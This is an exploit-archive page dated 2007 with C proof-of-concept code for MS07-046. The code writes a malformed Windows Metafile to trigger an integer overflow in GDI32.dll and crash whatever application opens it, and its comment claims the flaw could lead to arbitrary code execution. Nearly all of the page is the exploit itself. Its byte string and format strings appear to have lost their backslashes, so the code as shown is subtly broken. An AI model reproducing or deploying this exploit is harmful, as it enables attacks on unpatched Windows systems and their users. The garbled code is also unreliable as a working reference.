MS Windows (GDI32.DLL) Denial of Service Exploit (MS07-046)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MS Windows (GDI32.DLL) Denial of Service Exploit (MS07-046)
# Published : 2007-08-29
# Author : Gil-Dong / Woo-Chi
# Previous Title : Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit
# Next Title : Linux Kernel <=2.6.21.1 IPv6 Jumbo Bug Remote DoS Exploit

/*
 * MS07-046(GDI32.dll Integer overflow DOS) Proof Of Concept Code
 
 * by Hong Gil-Dong & Chun Woo-Chi

 * Yang yeon(?~1542), Korea
 * "I shall keep clenching my left fist unitl i see the real tao".

 * This POC is only for test. If an application read a malformed wmf 
 * file like this POC, the application will be crashed. If you apply 
 * this code, you can execute an arbitrary code.
 *

 * We tested this code on Windows XP SP2 Korean Edition 
 * (GDI32.dll version 5.1.2600.3099). But it will work well on other
 * systems.
 */

#include <stdio.h>
#include <windows.h>

#define WMF_FILE "ms07-046.wmf"

void usage(void);

int main()
{
	
	FILE *fp;

	char wmf[] = "x01x00x09x00x00x03x11x00x00x00x00x00"
                 "x05x00x00x00x00x00xFFxFFxFFxFFx13x02"
                 "x32x00x96x00x03x00x00x00x00x00";
	int i;
	
	HMETAFILE srcMeta;

    usage();

	if ((fp = fopen(WMF_FILE, "w")) == NULL) {
                printf("File %s write errorn", WMF_FILE);
                return 0;
	}

	for(i=0; i<sizeof(wmf)-1; i++)
		fputc(wmf[i], fp);

	fclose(fp);

    srcMeta = GetMetaFile(WMF_FILE);
    CopyMetaFile( srcMeta, NULL);

    return 0;
}

void usage(void) 
{
   printf("MS07-046 Windows Meta File RecordParms Integer Overflow n");
   printf("Proof of Concept by Hong Gil-Dong & Chun Woo-Chi n");
      
}

// www.Syue.com [2007-08-29]